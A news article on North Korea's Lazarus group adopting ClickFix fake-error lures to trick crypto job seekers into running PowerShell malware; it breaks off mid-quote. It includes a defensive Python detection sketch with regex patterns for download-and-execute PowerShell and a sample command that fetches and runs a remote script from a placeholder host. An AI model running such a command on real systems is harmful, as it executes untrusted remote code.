North Korean hackers adopt ClickFix attacks to target crypto firms
Published on: 2025-05-22 22:56:54
The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
This development, reported by Sekoia, is seen as an evolution of the threat actor's 'Contagious Interview' campaign that similarly targets job seekers in the AI and cryptocurrency space.
ClickFix is a relatively new but increasingly common tactic in which threat actors display fake errors on websites or in documents, claiming there is a problem viewing the content. The page then prompts the user to "fix" the issue by running PowerShell commands that download and execute the malware on the system.
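A defender-side sketch of how the behaviour described above can be spotted in process-creation telemetry, added here as an example and not taken from Sekoia's report or the original article. The record fields (`image`, `parent`, `cmdline`), the interactive-parent list, the scoring threshold and the sample events are assumptions constructed for illustration.

```python
import re

# Traits of a PowerShell command line that fetches and runs remote content.
DOWNLOAD = re.compile(
    r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
    r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
ENCODED = re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
# Assumption: a command the user pasted is started from an interactive surface.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return (score, reasons) for one simplified process-creation record."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd = event["cmdline"]
    checks = [(DOWNLOAD, "network download"),
              (EXECUTE, "in-memory execution"),
              (ENCODED, "encoded command"),
              (HIDDEN, "hidden window")]
    reasons = [label for rx, label in checks if rx.search(cmd)]
    parent = basename(event["parent"])
    if reasons and parent in INTERACTIVE_PARENTS:
        reasons.append("interactive parent " + parent)
    return len(reasons), reasons

def flag_clickfix(events, threshold=3):
    """Keep events that combine at least `threshold` suspicious traits."""
    return [e for e in events if score_event(e)[0] >= threshold]

# Constructed sample records (not real telemetry); example.invalid never resolves.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "Invoke-WebRequest https://example.invalid/report.csv -OutFile C:\Temp\report.csv"'},
]
```

Requiring several traits together keeps routine administrative PowerShell, such as the scheduled download in the last sample record, below the alert threshold.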
Sekoia says that Lazarus impersonates numerous well-known companies in the latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, the exchange from which the North Korean threat actors recently stole a record $1.5 billion.
"By collecting data (i.e. JSON objects) i
...